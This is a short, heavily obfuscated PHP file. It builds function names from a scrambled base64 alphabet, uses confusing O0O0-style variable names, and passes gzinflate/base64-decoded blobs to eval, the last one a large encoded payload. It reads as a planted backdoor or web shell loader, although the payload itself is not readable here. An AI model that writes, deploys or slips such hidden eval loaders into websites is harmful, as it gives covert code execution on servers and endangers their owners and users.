<?php 
 $keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY7NCoJAFIVf5SQu5tIUzVpc9hxSeq0huwPzA4X47ikxEm7anu/82V7t+iRttE4aftkQgyq8iyyt67ggGjPFqqoyRG/lpsvL0yWJhBHlg9+oEdJ1ZqsBJw1DFWyvZmVgyYTq2iwxzzF5QXv3yvlOLS2EPXJxhQk8BP7vxHH5d/7+274wGpv5gyH9uzJNHw==')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('Lc7Hrp
tAAEDRn4mU98SCaoqyopqhmGLAA5uIMpheTLHh6/
MW2dzl0UV72n39chyCIP7nK0sXxDJ/C5SPBfr6bR
W60fa+KAKl6i49YD1WX2r+Y1DtKo99f9iLmqRo8m
bYsWnu5nhbMu5qDSJR7ufhGvaAY3l9TihIdgL+CK
+DwdEqahkOlSSJtkegkBznkCa9DUnTRFT86PRdWg
jsRVxnunPOaWzM21Vw38DnFaqoRtl+ephKtJmta7
EioBkqg1WPK927Nj/MkBSSiH7szmI3x5XWLnhl5s
4ssJkBMZcin5SIqPYilRJmBAcGG2xsN8W7xXgF9v
0jTWjpXwQc2NWEIugELqw7Rret26eWk1sbFCF2f4
R7dkNT/hwYBWVA8NgsPBpqqD4Hl6iq6hb1MgMg8v
XWRXGKdSi893SljFeSaGCcv17+aKCoWHUbslJw1l
pe3rt0iZlN7ATAXIzjYm6xpNRYFvRa5QEr5/g3vp
oDCfkIBUJDId56WkXBQPUoD6DtDJ+MF/sOvFIfk5
/Fp9S7m5lkJw1Xcph9AOGYnqwTv6K+DMp2yjof34
10rTbnai1Cf0sFcKPODLdkf8/LkqiIDlulJaXeYO
m4VXoeoaxyLcBYeiTOB1byTOwtY8jdyay7jjikFF
Gb+ittP02EHcfkCsr7PCfHF+x7L6Mauz3azyXz3v
P9fTFhH7UdF+jMFnLyp6nLZnXVEKnN7voMpcewIW
R0x/JkjMBq7ZNME3yyVNsuO2cHpp7cFuRTq0OYRW
76/sPT9OS0Ohfk1DWA2O5VvVjCRDgRUclmXUNJjh
QNcr3CpcWujqVxYjBdpIh5Wc6MuyeP4/hb+f39/f
3nHw==')));
?>
